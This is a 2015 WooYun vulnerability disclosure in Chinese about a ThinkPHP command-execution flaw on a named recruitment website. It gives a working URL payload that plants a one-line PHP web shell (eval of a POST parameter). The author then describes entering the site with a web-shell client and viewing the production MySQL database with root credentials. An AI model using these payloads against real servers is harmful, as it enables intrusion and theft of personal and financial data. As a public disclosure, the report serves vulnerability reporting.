当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-099629

漏洞标题:某人才网getshell

相关厂商:某人才网

漏洞作者: 穿山甲

提交时间:2015-03-05 18:05

修复时间:2015-04-20 14:22

公开时间:2015-04-20 14:22

漏洞类型:命令执行

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-03-05: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-04-20: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

因thinkphp漏洞导致命令执行,从而导致网站被拿下。
这个网站看上去挺大的样子。

详细说明:

通过以下代码执行,发现漏洞

/index.php/module/action/param1/$%7B@phpinfo()%7D


从而一句话

http://www.zhyhr.com/index.php/module/action/param1/$%7B@eval($_POST[test])%7D


发现用MySQL数据库,找到mysql的root帐密,进数据库只是看了一下,绝对没脱裤,管理员可以检查:)

漏洞证明:

说明存在漏洞,可执行命令

2015-03-05_115331.gif


菜刀进入

2015-03-05_115409.gif


数据似乎很重要:关乎钱方面

2015-03-05_121100.gif


数据量最多的好几万

2015-03-05_122334.gif


修复方案:

thinkphp漏洞补上

版权声明:转载请注明来源 穿山甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:4 (WooYun评价)